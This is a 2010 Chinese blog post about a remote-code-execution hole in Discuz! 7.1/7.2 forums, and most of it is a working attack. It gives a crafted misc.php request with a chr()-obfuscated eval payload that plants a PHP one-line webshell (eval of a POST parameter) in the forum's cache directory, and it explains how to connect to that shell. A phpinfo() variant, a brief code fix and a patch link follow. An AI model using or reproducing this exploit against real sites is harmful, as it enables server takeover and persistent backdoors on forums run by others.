discuz 7.2的漏洞及修复方法
作者:蛛蛛虎 日期:2010-01-06
找到一个论坛,注册一个账号
注册好后,使用exp
复制内容到剪贴板
程序代码
程序代码http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
以上为exp
如若此处为空白,说明成功
存在该文件
php一句话连接forumdata/cache/usergroup_01.php
友情提示:非法入侵他人站点,一切后果自负
上文出自77169 `唐钰小宝
利用:注册后登陆 misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} 任意执行。
DZ 7.1、7.2 针对getshell的修复方法:
在common.inc.php上面加上$response=$scriptlang=array();
这个洞t00ls团队发现的,DZ官方已经被人日过了。
官方补丁:http://www.discuz.net/thread-1537673-1-1.html
[本日志由 蛛蛛虎 于 2011-01-12 10:25 AM 编辑]
上一篇: 要断网了
下一篇: 又一次奋战
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 漏洞
相关日志:
评论: 2 | 引用: 0 | 查看次数: -
回复
彭涛雅阁[2010-01-10 11:34 AM | 
| 
| 河南省郑州市 联通| 
| 取消审核]
发表评论